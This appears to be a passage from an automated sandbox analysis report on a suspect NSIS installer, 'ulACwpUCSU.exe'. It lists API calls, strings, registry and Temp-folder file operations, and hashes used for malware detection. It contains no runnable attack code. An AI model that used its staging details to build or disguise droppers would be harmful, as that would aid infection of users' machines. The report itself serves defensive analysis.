                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                          • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                          • API String ID: 900638850-516360298
                                          • Opcode ID: 4acb4603a534f03f61e1b5029561f8864cf9bf083dd2ad4547ff7456c33bf565
                                          • Instruction ID: 9c0e267699f90c8e910d98bdf84d4b8f2614ab6024826f89c9d009b20b1e8bc4
                                          • Opcode Fuzzy Hash: 4acb4603a534f03f61e1b5029561f8864cf9bf083dd2ad4547ff7456c33bf565
                                          • Instruction Fuzzy Hash: 10610571A04905ABDF215F64DC84B7B3BA8DB55304F10813BE641B62D1D33C4A42DF9E

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          [Figure: control-flow graph; first block 4055f6-40561c]
                                          APIs
                                          • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040561F
                                          • lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 00405667
                                          • lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 00405688
                                          • lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040568E
                                          • FindFirstFileA.KERNELBASE(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040569F
                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 0040574C
                                          • FindClose.KERNEL32(00000000), ref: 0040575D
                                          Strings
                                          • \*.*, xrefs: 00405661
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405604
                                          • "C:\Users\user\Desktop\ulACwpUCSU.exe", xrefs: 004055F6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                          • API String ID: 2035342205-2960928897
                                          • Opcode ID: 25106c92b3c871bc14427ef9fb8c6b07d152e7746fae866eacc9b6d331f36872
                                          • Instruction ID: a1a18f6d4a87cf364f513f4d5348cf8987bf6841df45d5f239a42b9e89fe31fb
                                          • Opcode Fuzzy Hash: 25106c92b3c871bc14427ef9fb8c6b07d152e7746fae866eacc9b6d331f36872
                                          • Instruction Fuzzy Hash: 8051D230905A04FADB216B618C89BBF7AB8DF42714F54803BF445721D2D73C4942EE6E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                                          • Instruction ID: 49e2905b870d629617cd54a3ad4ea64d750052a334705c7e6b68d35cedeefd19
                                          • Opcode Fuzzy Hash: 743aa33a108d29f9cab5e819e308a9554fb8e98817c33194d1e30fb36f92eda3
                                          • Instruction Fuzzy Hash: 28F17970D00229CBCF28CFA8C8946ADBBB1FF45305F25856ED856BB281D3785A96CF45
                                          APIs
                                          • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040208B
                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste, xrefs: 004020CB
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste
                                          • API String ID: 123533781-994438828
                                          • Opcode ID: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                          • Instruction ID: 1053df79af30500630abfeafbcf843dcec04d0d4e3091bc204b5fde3a4f6985c
                                          • Opcode Fuzzy Hash: 844d7db231ce930ba87aa91d55221135eb66824421c535283c4cff4e72d9e9e5
                                          • Instruction Fuzzy Hash: 3B416D71A00209BFCB40EFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54
                                          APIs
                                          • FindFirstFileA.KERNELBASE(?,00421548,Invaliditetsprocent209\indoktrineringen.rec,004058F7,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,00000000,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0), ref: 00406045
                                          • FindClose.KERNEL32(00000000), ref: 00406051
                                          Strings
                                          • Invaliditetsprocent209\indoktrineringen.rec, xrefs: 0040603A
                                          Similarity
                                          • API ID: Find$CloseFileFirst
                                          • String ID: Invaliditetsprocent209\indoktrineringen.rec
                                          • API String ID: 2295610775-2173611331
                                          • Opcode ID: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                          • Instruction ID: ffb9975cce6792308ede9dbdbab0a2e32819aea082b360212a672f9e7c6ece7a
                                          • Opcode Fuzzy Hash: 1aa7e4dc1003f693668b82639e535814eeaefdc3a4332bebb0b1aa5890d42f5a
                                          • Instruction Fuzzy Hash: 7BD012319490306BC3106B787C0C85B7A599F573317118A33B56AF12F0C7389C7286ED
                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                          • LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                          Similarity
                                          • API ID: AddressHandleLibraryLoadModuleProc
                                          • String ID:
                                          • API String ID: 310444273-0
                                          • Opcode ID: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                          • Instruction ID: 2c1b19e4de550b622e70843c6ca25527790cfa0381149662c4593fbace01eca7
                                          • Opcode Fuzzy Hash: 14778026069da28af87b9950d589da7dca929d2a00fc8d83b3a738ce3464f0c4
                                          • Instruction Fuzzy Hash: 00E0C232A04211ABC321AB749D48D3B73ACAFD8751309493EF50AF6150D734AC21EBBA

                                          APIs
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
                                          • ShowWindow.USER32(?), ref: 00403B72
                                          • DestroyWindow.USER32 ref: 00403B86
                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
                                          • GetDlgItem.USER32(?,?), ref: 00403BC3
                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
                                          • IsWindowEnabled.USER32(00000000), ref: 00403BDE
                                          • GetDlgItem.USER32(?,00000001), ref: 00403C8C
                                          • GetDlgItem.USER32(?,00000002), ref: 00403C96
                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
                                          • GetDlgItem.USER32(?,00000003), ref: 00403DA7
                                          • ShowWindow.USER32(00000000,?), ref: 00403DC8
                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDA
                                          • EnableWindow.USER32(?,?), ref: 00403DF5
                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
                                          • EnableMenuItem.USER32(00000000), ref: 00403E12
                                          • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2A
                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
                                          • lstrlenA.KERNEL32(Supersuspicion Setup: Installing,?,Supersuspicion Setup: Installing,00422F00), ref: 00403E66
                                          • SetWindowTextA.USER32(?,Supersuspicion Setup: Installing), ref: 00403E75
                                          • ShowWindow.USER32(?,0000000A), ref: 00403FA9
                                          Similarity
                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                          • String ID: Supersuspicion Setup: Installing
                                          • API String ID: 3282139019-3553124451
                                          • Opcode ID: ee793e9f516e2da13c3aa51fc91f44a41e00c2883a64dc2cf2643230f3a9d64a
                                          • Instruction ID: 1f8690e76de68066656ca8d54ad2d010e53819933bf2384d883f7e4ba9537b83
                                          • Opcode Fuzzy Hash: ee793e9f516e2da13c3aa51fc91f44a41e00c2883a64dc2cf2643230f3a9d64a
                                          • Instruction Fuzzy Hash: 17C1C071A04205BBDB21AF21ED48D2B7EBCFB44706F40443EF601B11E1C7799942AB6E

                                          APIs
                                            • Part of subcall function 00406061: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 00406073
                                            • Part of subcall function 00406061: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 0040607E
                                            • Part of subcall function 00406061: GetProcAddress.KERNEL32(00000000,?), ref: 0040608F
                                          • lstrcatA.KERNEL32(1033,Supersuspicion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Supersuspicion Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76CD3410,"C:\Users\user\Desktop\ulACwpUCSU.exe",00000000), ref: 00403802
                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun,1033,Supersuspicion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Supersuspicion Setup: Installing,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403877
                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 0040388A
                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403895
                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun), ref: 004038DE
                                            • Part of subcall function 00405C94: wsprintfA.USER32 ref: 00405CA1
                                          • RegisterClassA.USER32(00422EA0), ref: 0040391B
                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403933
                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403968
                                          • ShowWindow.USER32(00000005,00000000), ref: 0040399E
                                          • LoadLibraryA.KERNELBASE(RichEd20), ref: 004039AF
                                          • LoadLibraryA.KERNEL32(RichEd32), ref: 004039BA
                                          • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039CA
                                          • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039D7
                                          • RegisterClassA.USER32(00422EA0), ref: 004039E0
                                          • DialogBoxParamA.USER32(?,00000000,00403B19,00000000), ref: 004039FF
                                          Similarity
                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Supersuspicion Setup: Installing$_Nb
                                          • API String ID: 914957316-2759038005
                                          • Opcode ID: d69af52eae453a52e03acfe7140820e929eba722ac2574cb4842baacd9f3a248
                                          • Instruction ID: 361ceaa5e45529a70bb989737ed67fdedcb7c759bf8cf29c3cde223c60b7be46
                                          • Opcode Fuzzy Hash: d69af52eae453a52e03acfe7140820e929eba722ac2574cb4842baacd9f3a248
                                          • Instruction Fuzzy Hash: E661E6B16442007EE720AF659D45F273E6CEB8475AF40407FF941B22E2D67C9D02DA6E

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00402C8D
                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ulACwpUCSU.exe,00000400), ref: 00402CA9
                                            • Part of subcall function 004059C7: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 004059CB
                                            • Part of subcall function 004059C7: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059ED
                                          • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ulACwpUCSU.exe,C:\Users\user\Desktop\ulACwpUCSU.exe,80000000,00000003), ref: 00402CF2
                                          • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402E39
                                          Strings
                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402ED0
                                          • Inst, xrefs: 00402D60
                                          • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E82
                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C86, 00402E51
                                          • C:\Users\user\Desktop, xrefs: 00402CD4, 00402CD9, 00402CDF
                                          • Null, xrefs: 00402D72
                                          • C:\Users\user\Desktop\ulACwpUCSU.exe, xrefs: 00402C93, 00402CA2, 00402CB6, 00402CD3
                                          • soft, xrefs: 00402D69
                                          • "C:\Users\user\Desktop\ulACwpUCSU.exe", xrefs: 00402C79
                                          • Error launching installer, xrefs: 00402CC9
                                          Similarity
                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ulACwpUCSU.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft

                                          Control-flow Graph: image not preserved; first block 40173f-401762
                                          APIs
                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste,00000000,00000000,00000031), ref: 0040177E
                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste,00000000,00000000,00000031), ref: 004017A8
                                            • Part of subcall function 00405D36: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405D43
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                            • Part of subcall function 0040501F: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                            • Part of subcall function 0040501F: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll), ref: 0040508D
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                            • Part of subcall function 0040501F: SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                          • String ID: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp$C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll$C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste$Call

                                          Control-flow Graph: image not preserved; first block 40501f-405034
                                          APIs
                                          • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                          • lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
                                          • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00402C51,00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000), ref: 0040507B
                                          • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll), ref: 0040508D
                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050B3
                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004050CD
                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 004050DB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll

                                          Control-flow Graph: image not preserved; first block 40231c-402362
                                          APIs
                                          • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040235A
                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040237A
                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B3
                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nso2EBB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402490
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseCreateValuelstrlen
                                          • String ID: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp

                                          Control-flow Graph: image not preserved; first block 4015b3-4015c6
                                          APIs
                                            • Part of subcall function 0040585F: CharNextA.USER32(?,?,Invaliditetsprocent209\indoktrineringen.rec,?,004058CB,Invaliditetsprocent209\indoktrineringen.rec,Invaliditetsprocent209\indoktrineringen.rec,?,?,76CD2EE0,00405616,?,C:\Users\user\AppData\Local\Temp\,76CD2EE0,00000000), ref: 0040586D
                                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405872
                                            • Part of subcall function 0040585F: CharNextA.USER32(00000000), ref: 00405886
                                          • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                          • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                          • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste,00000000,00000000,000000F0), ref: 00401622
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste, xrefs: 00401617
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                          • String ID: C:\Users\user\AppData\Local\Temp\terephthalate\edderdun\Stillse\Limejuice\Saereste

                                          Control-flow Graph: image not preserved; first block 4059f6-405a00
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 00405A0A
                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405A24
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CountFileNameTempTick
                                          • String ID: "C:\Users\user\Desktop\ulACwpUCSU.exe"$C:\Users\user\AppData\Local\Temp\$nsa

                                          Control-flow Graph: image not preserved; first block 402a3d-402a66
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A5E
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9A
                                          • RegCloseKey.ADVAPI32(?), ref: 00402AA3
                                          • RegCloseKey.ADVAPI32(?), ref: 00402AC8
                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Close$DeleteEnumOpen
                                          • String ID:

                                          Control-flow Graph: image not preserved; first block 100016bd-100016f9
                                          APIs
                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                            • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                          • GlobalFree.KERNEL32(00000000), ref: 10001768
                                          • FreeLibrary.KERNEL32(?), ref: 100017DF
                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                            • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                            • Part of subcall function 1000258D: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FF
                                            • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2905161694.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 00000000.00000002.2905123603.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000000.00000002.2905192299.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000000.00000002.2905221858.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                          Similarity
                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                          • String ID:

                                          Control-flow Graph: image not preserved; first block 401bb8-401bd0
                                          APIs
                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2883507559.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2883466363.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883546489.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883578511.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2883751238.0000000000438000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_ulACwpUCSU.jbxd
                                          Similarity
                                          • API ID: MessageSend$Timeout
                                          • String ID: !
                                          • API String ID: 1777923405-2657877971
                                          • Opcode ID: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                          • Instruction ID: c8505a4ed1fbcfe48898eca751f608fe424cacc25c72cee6cab93c7adb8e4515
                                          • Opcode Fuzzy Hash: 223d8f7865d2b1dd0e95bc8f55079009c40be9e2a37a1be7db68750e4265ac19
                                          • Instruction Fuzzy Hash: 742190B1A44208BFEF41AFB4CD4AAAE7BB5EF40344F14453EF541B61D1D6B89A40E728
                                          APIs
                                          • GetTickCount.KERNEL32 ref: 0040304F
                                            • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                          • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000), ref: 00403082
                                          • WriteFile.KERNELBASE(0040A8A0,0040DF4B,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?), ref: 0040313C
                                          • SetFilePointer.KERNELBASE(000059BC,00000000,00000000,004128A0,00004000,?,00000000,?,00402F52,00000004,00000000,00000000,?,?,?,00402ECB), ref: 0040318E
                                          Similarity
                                          • API ID: File$Pointer$CountTickWrite
                                          • String ID:
                                          • API String ID: 2146148272-0
                                          • Opcode ID: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                                          • Instruction ID: 01a25493adf58fb9a894681412e440a2e883d4234beea4965eba9eb13e735820
                                          • Opcode Fuzzy Hash: 24d90e6fe24fc4b927ba7929ca5aee42abf3264703176f7c86ada2f370568673
                                          • Instruction Fuzzy Hash: CC414F725052019FDB10BF29EE849663BFCFB4431A715863BE810BA2E4D7389D52CB5E
                                          APIs
                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405058
                                            • Part of subcall function 0040501F: lstrlenA.KERNEL32(00402C51,Skipped: C:\Users\user\AppData\Local\Temp\nso2EBB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405068
